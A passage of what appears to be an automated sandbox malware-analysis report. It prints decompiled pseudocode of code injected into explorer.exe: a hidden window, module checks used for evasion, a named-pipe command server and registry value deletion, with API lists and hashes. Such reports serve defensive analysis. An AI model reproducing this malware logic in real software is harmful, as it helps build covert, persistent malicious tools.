                                          				_v52 = 0x30;
                                          				_v12 =  &_v144;
                                          				_v44 = E000C2E77;
                                          				_push( &_v52);
                                          				_t32 =  *0xde694; // 0x14cfa48
                                          				_v32 = _t64;
                                          				if( *((intOrPtr*)(_t32 + 8))() == 0) {
                                          					L6:
                                          					_t34 =  *0xde718; // 0x30094
                                          					if(_t34 != 0) {
                                          						_t39 =  *0xde694; // 0x14cfa48
                                          						 *((intOrPtr*)(_t39 + 0x28))(_t34);
                                          					}
                                          					L8:
                                          					_t36 =  *0xde694; // 0x14cfa48
                                          					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
                                          					return 0;
                                          				}
                                          				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
                                          				 *0xde718 = _t44;
                                          				if(_t44 == 0) {
                                          					goto L8;
                                          				}
                                          				ShowWindow(_t44, 0);
                                          				_t47 =  *0xde694; // 0x14cfa48
                                          				 *((intOrPtr*)(_t47 + 0x18))( *0xde718);
                                          				while(1) {
                                          					_t50 =  *0xde694; // 0x14cfa48
                                          					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
                                          					if(_t51 == 0) {
                                          						goto L6;
                                          					}
                                          					if(_t51 == 0xffffffff) {
                                          						goto L6;
                                          					}
                                          					_t53 =  *0xde694; // 0x14cfa48
                                          					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
                                          					_t56 =  *0xde694; // 0x14cfa48
                                          					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
                                          				}
                                          				goto L6;
                                          			}


                                          APIs
                                          • memset.MSVCRT ref: 000C2EF9
                                          • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 000C2F77
                                          • ShowWindow.USER32(00000000,00000000), ref: 000C2F8A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$CreateShowmemset
                                          • String ID: 0
                                          • API String ID: 3027179219-4108050209
                                          • Opcode ID: 6eaffb3ee9b8b2be26461f6bad7f1446fdbb12cf683fc5f7db915b76c7ab6cb2
                                          • Instruction ID: a9f914c0b4fadeb3d72a178da7fd84f66818822a173e8fe5a0fe974533a9003f
                                          • Opcode Fuzzy Hash: 6eaffb3ee9b8b2be26461f6bad7f1446fdbb12cf683fc5f7db915b76c7ab6cb2
                                          • Instruction Fuzzy Hash: ED31F5B1501218AFF750EF68DC89FAA7BBCEB18344F00406AB909DB262D634DD058B71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 181 c4d6d-c4d8f 182 c4dee-c4e1b call cb7a8 call ca86d call ca471 181->182 183 c4d91-c4db3 call c95c7 * 2 181->183 196 c4e1d-c4e20 182->196 197 c4e25-c4e80 call ce1bc call c95e1 call c92e5 call c85d5 call cb269 182->197 183->182 193 c4db5-c4db7 183->193 193->182 195 c4db9-c4dc4 GetModuleHandleA 193->195 198 c4dcd 195->198 199 c4dc6-c4dcb GetModuleHandleA 195->199 200 c52b9-c52bf 196->200 216 c4ea1-c4ed9 call c861a call c4a0b 197->216 217 c4e82-c4e93 call c896f 197->217 202 c4dd5-c4dec call c85c2 * 2 198->202 199->198 199->202 202->182 202->196 227 c4ef8-c4f1b 216->227 228 c4edb-c4ee3 216->228 222 c4e9c-c4e9f 217->222 223 c4e95-c4e97 call ca2e3 217->223 222->216 223->222 230 c4f1d-c4f2b 227->230 231 c4f2f-c4f4d call ce2c6 227->231 228->227 229 c4ee5-c4ee9 228->229 232 c4eef-c4ef2 229->232 233 c51f3-c5220 call c95e1 call c92e5 229->233 230->231 239 c4f52-c4f54 231->239 232->227 232->233 244 c5247-c52b4 call c85d5 lstrcpynW * 2 call c8fbe call c861a * 2 233->244 245 c5222-c522b call cb269 233->245 241 c4f56-c4f6a call ce2c6 239->241 242 c4f71-c4f78 239->242 241->242 242->233 243 c4f7e-c4f87 242->243 247 c4f89-c4f8e 243->247 248 c4f96-c4fa3 243->248 277 c52b7 244->277 259 c522d-c5232 245->259 260 c5239-c5246 call c861a 245->260 247->248 252 c4f90 247->252 248->233 253 c4fa9-c4fad 248->253 252->248 256 c5082-c5088 253->256 257 c4fb3-c4fb6 253->257 256->233 264 c508e-c50ff call c49a5 call cfc1f 256->264 257->233 262 c4fbc-c500f call c49a5 call c8604 257->262 259->260 260->244 262->277 282 c5015-c507d call c95e1 call c9640 call c85d5 call ca911 call c861a 262->282 264->233 281 c5105-c5119 call c8604 264->281 277->200 281->233 288 c511f-c5171 call c109a call c902d call c60df 281->288 282->277 302 c51e5-c51f2 call c861a 288->302 303 c5173-c51e2 call c9640 call c85d5 call ca911 call c861a 288->303 302->233 303->302
                                          C-Code - Quality: 70%
                                          			E000C4D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
                                          				char _v516;
                                          				char _v556;
                                          				char _v564;
                                          				char _v568;
                                          				char _v572;
                                          				char _v576;
                                          				intOrPtr _v580;
                                          				char _v588;
                                          				signed int _v596;
                                          				intOrPtr _v602;
                                          				intOrPtr _v604;
                                          				char _v608;
                                          				CHAR* _v612;
                                          				CHAR* _v616;
                                          				signed int _v620;
                                          				signed int _v624;
                                          				signed int _v628;
                                          				signed int _v632;
                                          				char _v636;
                                          				intOrPtr _t119;
                                          				void* _t120;
                                          				signed int _t122;
                                          				intOrPtr _t123;
                                          				CHAR* _t124;
                                          				intOrPtr _t125;
                                          				CHAR* _t127;
                                          				WCHAR* _t130;
                                          				intOrPtr _t133;
                                          				intOrPtr _t137;
                                          				WCHAR* _t138;
                                          				intOrPtr _t142;
                                          				WCHAR* _t143;
                                          				CHAR* _t144;
                                          				intOrPtr _t145;
                                          				intOrPtr _t150;
                                          				intOrPtr _t153;
                                          				WCHAR* _t154;
                                          				signed int _t159;
                                          				WCHAR* _t160;
                                          				intOrPtr _t163;
                                          				intOrPtr _t165;
                                          				intOrPtr _t166;
                                          				intOrPtr _t170;
                                          				signed int _t173;
                                          				signed int _t178;
                                          				intOrPtr _t182;
                                          				WCHAR* _t184;
                                          				char _t186;
                                          				WCHAR* _t188;
                                          				intOrPtr _t200;
                                          				intOrPtr _t211;
                                          				signed int _t215;
                                          				char _t220;
                                          				WCHAR* _t231;
                                          				intOrPtr _t235;
                                          				intOrPtr _t238;
                                          				intOrPtr _t239;
                                          				intOrPtr _t246;
                                          				signed int _t248;
                                          				WCHAR* _t249;
                                          				CHAR* _t250;
                                          				intOrPtr _t262;
                                          				void* _t271;
                                          				intOrPtr _t272;
                                          				signed int _t277;
                                          				void* _t278;
                                          				intOrPtr _t280;
                                          				signed int _t282;
                                          				void* _t298;
                                          				void* _t299;
                                          				intOrPtr _t305;
                                          				CHAR* _t326;
                                          				void* _t328;
                                          				WCHAR* _t329;
                                          				intOrPtr _t331;
                                          				WCHAR* _t333;
                                          				signed int _t335;
                                          				intOrPtr* _t337;
                                          				void* _t338;
                                          				void* _t339;
                                          				void* _t353;
                                          
                                          				_t353 = __fp0;
                                          				_t337 = (_t335 & 0xfffffff8) - 0x26c;
                                          				_t119 =  *0xde688; // 0xf0000
                                          				_v620 = _v620 & 0x00000000;
                                          				_t328 = __ecx;
                                          				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
                                          					L7:
                                          					_t120 = E000CB7A8(0xdb9c8,  &_v516); // executed
                                          					_t14 = _t120 + 1; // 0x1
                                          					E000CA86D( &_v556, _t14, _t351);
                                          					_t298 = 0x64;
                                          					_t122 = E000CA471( &_v556, _t298);
                                          					 *0xde748 = _t122;
                                          					if(_t122 != 0) {
                                          						_push(0x4e5);
                                          						_t299 = 0x10;
                                          						_t123 = E000CE1BC(0xdb9cc, _t299); // executed
                                          						 *0xde680 = _t123;
                                          						 *_t337 = 0x610;
                                          						_t124 = E000C95E1(0xdb9cc);
                                          						_push(0);
                                          						_push(_t124);
                                          						_v612 = _t124;
                                          						_t125 =  *0xde688; // 0xf0000
                                          						_t127 = E000C92E5(_t125 + 0x228);
                                          						_t338 = _t337 + 0xc;
                                          						_v616 = _t127;
                                          						E000C85D5( &_v612);
                                          						_t130 = E000CB269(_t127);
                                          						_t246 = 3;
                                          						__eflags = _t130;
                                          						if(_t130 != 0) {
                                          							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
                                          							 *_t328 = _t246;
                                          						}
                                          						E000C861A( &_v616, 0xfffffffe);
                                          						_t133 =  *0xde688; // 0xf0000
                                          						_t22 = _t133 + 0x114; // 0xf0114
                                          						E000C4A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
                                          						_t262 =  *0xde688; // 0xf0000
                                          						_t339 = _t338 + 0x14;
                                          						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
                                          						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
                                          							L17:
                                          							asm("stosd");
                                          							asm("stosd");
                                          							asm("stosd");
                                          							asm("stosd");
                                          							asm("stosd");
                                          							_v572 = _t328;
                                          							_v576 =  *((intOrPtr*)(_t262 + 0x214));
                                          							_t137 =  *0xde680; // 0x14cfda0
                                          							_t138 =  *(_t137 + 8);
                                          							__eflags = _t138;
                                          							if(_t138 != 0) {
                                          								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
                                          							}
                                          							_v620 = _v620 & 0x00000000;
                                          							E000CE2C6(_t353,  &_v576); // executed
                                          							_pop(_t262);
                                          							_t142 =  *0xde6b4; // 0x14cfa98
                                          							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
                                          							__eflags = _t143;
                                          							if(_t143 == 0) {
                                          								E000CE2C6(_t353,  &_v588);
                                          								_t235 =  *0xde6b4; // 0x14cfa98
                                          								_pop(_t262);
                                          								 *((intOrPtr*)(_t235 + 0xc))(_v632);
                                          							}
                                          							__eflags =  *0xde73c;
                                          							if( *0xde73c <= 0) {
                                          								goto L36;
                                          							} else {
                                          								_t165 =  *0xde680; // 0x14cfda0
                                          								__eflags =  *(_t165 + 8);
                                          								if( *(_t165 + 8) != 0) {
                                          									_t231 =  *(_t165 + 0xc);
                                          									__eflags = _t231;
                                          									if(_t231 != 0) {
                                          										 *_t231(_v580);
                                          									}
                                          								}
                                          								_t166 =  *0xde688; // 0xf0000
                                          								_t262 =  *((intOrPtr*)(_t166 + 0x214));
                                          								__eflags = _t262 - _t246;
                                          								if(_t262 == _t246) {
                                          									goto L36;
                                          								} else {
                                          									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
                                          									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
                                          										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
                                          										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
                                          											E000C49A5();
                                          											asm("stosd");
                                          											asm("stosd");
                                          											asm("stosd");
                                          											asm("stosd");
                                          											_t170 =  *0xde684; // 0x14cf8f0
                                          											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
                                          											_t262 = _v602;
                                          											_t248 = 0x3c;
                                          											_t173 = _t262 + 0x00000002 & 0x0000ffff;
                                          											_v596 = _t173;
                                          											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
                                          											_t178 = _t262 + 0x0000000e & 0x0000ffff;
                                          											_v624 = _t178;
                                          											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
                                          											_t182 =  *0xde688; // 0xf0000
                                          											_t184 = E000CFC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
                                          											_t339 = _t339 + 0xc;
                                          											__eflags = _t184;
                                          											if(_t184 >= 0) {
                                          												_t333 = E000C8604(0x1000);
                                          												_v616 = _t333;
                                          												_pop(_t262);
                                          												__eflags = _t333;
                                          												if(_t333 != 0) {
                                          													_t186 = E000C109A(_t262, 0x148);
                                          													_t305 =  *0xde688; // 0xf0000
                                          													_v636 = _t186;
                                          													_push(_t305 + 0x648);
                                          													_push(0xa);
                                          													_push(7);
                                          													_t271 = 2;
                                          													E000C902D(_t271,  &_v572);
                                          													_t272 =  *0xde688; // 0xf0000
                                          													_t188 = E000C60DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
                                          													_t339 = _t339 + 0x18;
                                          													_v632 = _t188;
                                          													__eflags = _t188;
                                          													if(_t188 != 0) {
                                          														_push(_v624 % _t248 & 0x0000ffff);
                                          														_push(_v628 & 0x0000ffff);
                                          														_push(_v596 % _t248 & 0x0000ffff);
                                          														_push(_v620 & 0x0000ffff);
                                          														_push(_v632);
                                          														_push( &_v572);
                                          														_t200 =  *0xde688; // 0xf0000
                                          														__eflags = _t200 + 0x1020;
                                          														E000C9640(_t333, 0x1000, _v636, _t200 + 0x1020);
                                          														E000C85D5( &_v636);
                                          														E000CA911(_t333, 0, 0xbb8, 1);
                                          														E000C861A( &_v632, 0xfffffffe);
                                          														_t339 = _t339 + 0x44;
                                          													}
                                          													E000C861A( &_v616, 0xfffffffe);
                                          													_pop(_t262);
                                          												}
                                          											}
                                          										}
                                          										goto L36;
                                          									}
                                          									__eflags = _t262 - 2;
                                          									if(_t262 != 2) {
                                          										goto L36;
                                          									}
                                          									E000C49A5();
                                          									asm("stosd");
                                          									asm("stosd");
                                          									asm("stosd");
                                          									asm("stosd");
                                          									_t211 =  *0xde684; // 0x14cf8f0
                                          									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
                                          									_t215 = _v602 + 0x00000002 & 0x0000ffff;
                                          									_v628 = _t215;
                                          									_t277 = 0x3c;
                                          									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
                                          									_t249 = E000C8604(0x1000);
                                          									_v624 = _t249;
                                          									_pop(_t278);
                                          									__eflags = _t249;
                                          									if(_t249 != 0) {
                                          										_t220 = E000C95E1(_t278, 0x32d);
                                          										_t280 =  *0xde688; // 0xf0000
                                          										_push(_t280 + 0x228);
                                          										_t282 = 0x3c;
                                          										_v636 = _t220;
                                          										_push(_v628 % _t282 & 0x0000ffff);
                                          										E000C9640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
                                          										E000C85D5( &_v636);
                                          										E000CA911(_t249, 0, 0xbb8, 1);
                                          										E000C861A( &_v624, 0xfffffffe);
                                          									}
                                          									goto L41;
                                          								}
                                          							}
                                          						} else {
                                          							_t238 =  *((intOrPtr*)(_t262 + 0x214));
                                          							__eflags = _t238 - _t246;
                                          							if(_t238 == _t246) {
                                          								goto L17;
                                          							}
                                          							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
                                          							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
                                          								L36:
                                          								_t144 = E000C95E1(_t262, 0x610);
                                          								_push(0);
                                          								_push(_t144);
                                          								_v616 = _t144;
                                          								_t145 =  *0xde688; // 0xf0000
                                          								_t329 = E000C92E5(_t145 + 0x228);
                                          								_v612 = _t329;
                                          								__eflags = _t329;
                                          								if(_t329 != 0) {
                                          									_t160 = E000CB269(_t329);
                                          									__eflags = _t160;
                                          									if(_t160 != 0) {
                                          										_t163 =  *0xde684; // 0x14cf8f0
                                          										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
                                          									}
                                          									E000C861A( &_v612, 0xfffffffe);
                                          								}
                                          								E000C85D5( &_v616);
                                          								_t150 =  *0xde688; // 0xf0000
                                          								lstrcpynW(_t150 + 0x438,  *0xde740, 0x105);
                                          								_t153 =  *0xde688; // 0xf0000
                                          								_t154 = _t153 + 0x228;
                                          								__eflags = _t154;
                                          								lstrcpynW(_t154,  *0xde738, 0x105);
                                          								_t331 =  *0xde688; // 0xf0000
                                          								_t117 = _t331 + 0x228; // 0xf0228
                                          								 *((intOrPtr*)(_t331 + 0x434)) = E000C8FBE(_t117, __eflags);
                                          								E000C861A(0xde740, 0xfffffffe);
                                          								E000C861A(0xde738, 0xfffffffe);
                                          								L41:
                                          								_t159 = 0;
                                          								__eflags = 0;
                                          								L42:
                                          								return _t159;
                                          							}
                                          							__eflags = _t238 - 2;
                                          							if(_t238 != 2) {
                                          								goto L36;
                                          							}
                                          							goto L17;
                                          						}
                                          					}
                                          					L8:
                                          					_t159 = _t122 | 0xffffffff;
                                          					goto L42;
                                          				}
                                          				_t250 = E000C95C7(0x6e2);
                                          				_v616 = _t250;
                                          				_t326 = E000C95C7(0x9f5);
                                          				_v612 = _t326;
                                          				if(_t250 != 0 && _t326 != 0) {
                                          					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
                                          						_v620 = 1;
                                          					}
                                          					E000C85C2( &_v616);
                                          					_t122 = E000C85C2( &_v612);
                                          					_t351 = _v620;
                                          					if(_v620 != 0) {
                                          						goto L8;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 000C4DC0
                                          • GetModuleHandleA.KERNEL32(00000000), ref: 000C4DC7
                                          • lstrcpynW.KERNEL32(000EFBC8,00000105), ref: 000C526F
                                          • lstrcpynW.KERNEL32(000EFDD8,00000105), ref: 000C5283
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleModulelstrcpyn
                                          • String ID:
                                          • API String ID: 3430401031-0
                                          • Opcode ID: daa6f0749694e7ac1462caa31c5450f290e1f394fe52ddb5101126fd241d7950
                                          • Instruction ID: c173cb8aab5dce0c54eecf333e52df57e25390bf92b520147ff03b0ab50bf869
                                          • Opcode Fuzzy Hash: daa6f0749694e7ac1462caa31c5450f290e1f394fe52ddb5101126fd241d7950
                                          • Instruction Fuzzy Hash: 36E1CF71604341AFE750EF64CC86FAE73E9AB98314F040A2EF944DB2D2DB74D9448B62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 314 c32a1-c32b4 315 c32b7-c32ce ConnectNamedPipe 314->315 316 c32d0-c32db GetLastError 315->316 317 c32e1-c3304 315->317 316->317 318 c34c2-c34c8 316->318 320 c34a8 GetLastError 317->320 321 c330a-c330e 317->321 322 c34ae-c34bc DisconnectNamedPipe 320->322 321->320 323 c3314-c3320 321->323 322->315 322->318 324 c33b8-c33d1 call c93be 323->324 325 c3326-c3329 323->325 333 c3476-c349b call c96ca 324->333 334 c33d7-c33dd 324->334 327 c332b-c332f 325->327 328 c3397-c33b3 call cc319 325->328 330 c337b-c3384 call cf79f 327->330 331 c3331-c3334 327->331 328->322 350 c3358-c335b 330->350 336 c3365-c3369 call cf79f 331->336 337 c3336-c3339 331->337 353 c349d-c34a6 call cc319 333->353 339 c33df-c33f6 call c8604 334->339 340 c3454-c346f call c9749 call c1da0 334->340 348 c336e-c3376 336->348 343 c334f-c3353 call cf7c1 337->343 344 c333b-c333e 337->344 361 c33f8-c33fd 339->361 362 c3471 339->362 340->333 343->350 344->322 351 c3344-c334d call cf7c1 344->351 348->353 354 c335d-c3363 350->354 355 c3386-c3388 350->355 351->348 353->322 360 c338a-c3392 call cc319 354->360 355->360 360->322 366 c33ff-c3402 361->366 367 c342a-c3452 call c9749 call c1da0 call c94b7 361->367 370 c3473 362->370 372 c3404-c3425 call cc379 call c91a6 366->372 367->370 370->333 383 c3427 372->383 383->367
                                          C-Code - Quality: 54%
                                          			E000C32A1() {
                                          				char _v8;
                                          				struct _OVERLAPPED* _v12;
                                          				struct _OVERLAPPED* _v16;
                                          				intOrPtr* _v20;
                                          				char _v24;
                                          				intOrPtr _v32;
                                          				signed int _v36;
                                          				intOrPtr* _v40;
                                          				char _v168;
                                          				char _v172;
                                          				intOrPtr _t41;
                                          				void* _t47;
                                          				char _t54;
                                          				char _t61;
                                          				intOrPtr _t64;
                                          				void* _t65;
                                          				void* _t68;
                                          				void* _t70;
                                          				void* _t72;
                                          				void* _t76;
                                          				struct _OVERLAPPED* _t82;
                                          				intOrPtr* _t83;
                                          				signed int _t84;
                                          				signed short* _t86;
                                          				intOrPtr* _t97;
                                          				signed short* _t105;
                                          				void* _t107;
                                          				void* _t108;
                                          				void* _t109;
                                          				intOrPtr* _t112;
                                          				struct _OVERLAPPED* _t113;
                                          				char _t114;
                                          				void* _t115;
                                          
                                          				_t113 = 0;
                                          				_t82 = 0;
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				while(1) {
                                          					_v16 = _t113;
                                          					if(ConnectNamedPipe( *0xde674, _t113) == 0 && GetLastError() != 0x217) {
                                          						break;
                                          					}
                                          					_push(_t113);
                                          					_push( &_v16);
                                          					_t41 =  *0xde684; // 0x14cf8f0
                                          					_push(0x80000);
                                          					_push( *0xde724);
                                          					_push( *0xde674);
                                          					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
                                          						GetLastError();
                                          					} else {
                                          						_t86 =  *0xde724; // 0x13a0020
                                          						_t47 = ( *_t86 & 0x0000ffff) - 1;
                                          						if(_t47 == 0) {
                                          							_t112 = E000C93BE( &(_t86[4]), 0x20, 1,  &_v24);
                                          							_v40 = _t112;
                                          							if(_t112 != 0) {
                                          								_t114 = _v24;
                                          								if(_t114 <= 1) {
                                          									_t113 = 0;
                                          									_t54 = E000C1DA0(E000C9749( *_t112), 0, 0, 0);
                                          									_t115 = _t115 + 0x10;
                                          									_v172 = _t54;
                                          								} else {
                                          									_v36 = _t114 - 1;
                                          									_t83 = E000C8604(_t114 - 1 << 2);
                                          									_v32 = _t83;
                                          									if(_t83 == 0) {
                                          										_t113 = 0;
                                          									} else {
                                          										if(_t114 > 1) {
                                          											_v20 = _t83;
                                          											_t84 = 1;
                                          											do {
                                          												_t64 = E000C91A6( *((intOrPtr*)(_t112 + _t84 * 4)), E000CC379( *((intOrPtr*)(_t112 + _t84 * 4))));
                                          												_t97 = _v20;
                                          												_t84 = _t84 + 1;
                                          												 *_t97 = _t64;
                                          												_v20 = _t97 + 4;
                                          											} while (_t84 < _t114);
                                          											_t83 = _v32;
                                          										}
                                          										_t113 = 0;
                                          										_t61 = E000C1DA0(E000C9749( *_t112), _t83, _v36, 0);
                                          										_t115 = _t115 + 0x10;
                                          										_v172 = _t61;
                                          										E000C94B7( &_v24);
                                          									}
                                          									_t82 = _v12;
                                          								}
                                          							}
                                          							_t105 =  *0xde724; // 0x13a0020
                                          							E000C96CA( &_v168,  &(_t105[4]), 0x80);
                                          							_push(0x84);
                                          							_push( &_v172);
                                          							_push(2);
                                          							goto L33;
                                          						} else {
                                          							_t65 = _t47 - 3;
                                          							if(_t65 == 0) {
                                          								_push(_t113);
                                          								_push(_t113);
                                          								_t108 = 5;
                                          								E000CC319(_t108);
                                          								 *0xde758 = 1;
                                          								_t82 = 1;
                                          								_v12 = 1;
                                          							} else {
                                          								_t68 = _t65;
                                          								if(_t68 == 0) {
                                          									_t70 = E000CF79F( &_v8);
                                          									goto L13;
                                          								} else {
                                          									_t72 = _t68 - 1;
                                          									if(_t72 == 0) {
                                          										E000CF79F( &_v8);
                                          										goto L16;
                                          									} else {
                                          										_t76 = _t72 - 1;
                                          										if(_t76 == 0) {
                                          											_t70 = E000CF7C1( &_v8);
                                          											L13:
                                          											if(_t70 == 0) {
                                          												_push(_t113);
                                          												_push(_t113);
                                          												_push(0xa);
                                          											} else {
                                          												_push(_v8);
                                          												_push(_t70);
                                          												_push(5);
                                          											}
                                          											_pop(_t109);
                                          											E000CC319(_t109);
                                          										} else {
                                          											if(_t76 == 1) {
                                          												E000CF7C1( &_v8);
                                          												L16:
                                          												_push(4);
                                          												_push( &_v8);
                                          												_push(5);
                                          												L33:
                                          												_pop(_t107);
                                          												E000CC319(_t107);
                                          												_t115 = _t115 + 0xc;
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          					DisconnectNamedPipe( *0xde674);
                                          					if(_t82 == 0) {
                                          						continue;
                                          					}
                                          					break;
                                          				}
                                          				return 0;
                                          			}

                                          APIs
                                          • ConnectNamedPipe.KERNELBASE(00000000), ref: 000C32C6
                                          • GetLastError.KERNEL32 ref: 000C32D0
                                            • Part of subcall function 000CC319: FlushFileBuffers.KERNEL32(000001FC), ref: 000CC35F
                                          • DisconnectNamedPipe.KERNEL32 ref: 000C34B4
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
                                          • String ID:
                                          • API String ID: 2389948835-0
                                          • Opcode ID: bf80b9096a2aca5aa3972cea32dde4ba6c78e98aa77ff021d4b3e440f009a802
                                          • Instruction ID: 58aa84d8eb2c3f5bebb521c1968008652298eb85fb782967e61da74a0d83595a
                                          • Opcode Fuzzy Hash: bf80b9096a2aca5aa3972cea32dde4ba6c78e98aa77ff021d4b3e440f009a802
                                          • Instruction Fuzzy Hash: EA512471A10205AFDB61EFA4DC89FEEBBB8EF05300F10812EF504A6152DB349B44CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 384 c61b4-c61f9 memset call c8604 387 c61ff-c6211 call c8604 384->387 388 c6363-c6369 384->388 387->388 391 c6217-c6234 RegOpenKeyExW 387->391 392 c623a-c626d 391->392 393 c6333-c6337 391->393 399 c627f-c6284 392->399 400 c626f-c627a 392->400 394 c6339-c633e 393->394 395 c6344-c635b call c861a * 2 393->395 394->395 405 c6360 395->405 399->393 401 c628a 399->401 400->393 404 c628d-c62dc memset * 2 401->404 407 c62de-c62ee 404->407 408 c6326-c632d 404->408 405->388 410 c62f0-c6304 407->410 411 c6323 407->411 408->393 408->404 410->411 413 c6306-c6313 call cc392 410->413 411->408 416 c631c-c631e call cb1b1 413->416 417 c6315-c6317 413->417 416->411 417->416
                                          C-Code - Quality: 80%
                                          			E000C61B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				void* _v8;
                                          				int _v12;
                                          				int _v16;
                                          				int _v20;
                                          				char _v24;
                                          				char _v28;
                                          				void* _v32;
                                          				void* _v36;
                                          				char _v40;
                                          				char _v44;
                                          				char _v48;
                                          				char _v56;
                                          				void _v576;
                                          				intOrPtr _t63;
                                          				intOrPtr _t72;
                                          				intOrPtr _t80;
                                          				intOrPtr _t81;
                                          				intOrPtr _t82;
                                          				signed int _t85;
                                          				intOrPtr _t87;
                                          				int _t89;
                                          				intOrPtr _t90;
                                          				intOrPtr _t92;
                                          				void* _t96;
                                          				void* _t97;
                                          				void* _t98;
                                          				void* _t99;
                                          				void* _t100;
                                          				void* _t108;
                                          
                                          				_t108 = __fp0;
                                          				_t96 = __edx;
                                          				_t89 = 0;
                                          				_v8 = 0;
                                          				memset( &_v576, 0, 0x208);
                                          				_v28 = 0x104;
                                          				_v20 = 0x3fff;
                                          				_v16 = 0;
                                          				_t98 = E000C8604(0x3fff);
                                          				_t100 = _t99 + 0x10;
                                          				_v32 = _t98;
                                          				if(_t98 == 0) {
                                          					L18:
                                          					return 0;
                                          				}
                                          				_t97 = E000C8604(0x800);
                                          				_v36 = _t97;
                                          				if(_t97 == 0) {
                                          					goto L18;
                                          				}
                                          				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
                                          					L15:
                                          					if(_v8 != 0) {
                                          						_t63 =  *0xde68c; // 0x14cfab8
                                          						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
                                          					}
                                          					E000C861A( &_v32, 0x3fff); // executed
                                          					E000C861A( &_v36, 0x800); // executed
                                          					goto L18;
                                          				}
                                          				_push( &_v56);
                                          				_push( &_v40);
                                          				_push( &_v44);
                                          				_push( &_v48);
                                          				_push( &_v24);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				_push( &_v28);
                                          				_push( &_v576);
                                          				_t72 =  *0xde68c; // 0x14cfab8
                                          				_push(_v8);
                                          				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
                                          					__eflags = _v24;
                                          					if(_v24 == 0) {
                                          						goto L15;
                                          					}
                                          					_v12 = 0;
                                          					do {
                                          						memset(_t97, 0, 0x800);
                                          						memset(_t98, 0, 0x3fff);
                                          						_t100 = _t100 + 0x18;
                                          						_v20 = 0x3fff;
                                          						_v16 = 0x800;
                                          						 *_t98 = 0;
                                          						_t80 =  *0xde68c; // 0x14cfab8
                                          						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
                                          						__eflags = _t81;
                                          						if(_t81 == 0) {
                                          							_t82 =  *0xde690; // 0x14cfb90
                                          							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
                                          							__eflags = _t90;
                                          							if(_t90 != 0) {
                                          								_t92 =  *0xde68c; // 0x14cfab8
                                          								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
                                          								__eflags = _a16;
                                          								if(_a16 != 0) {
                                          									_t85 = E000CC392(_t90);
                                          									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
                                          									if(__eflags == 0) {
                                          										__eflags = 0;
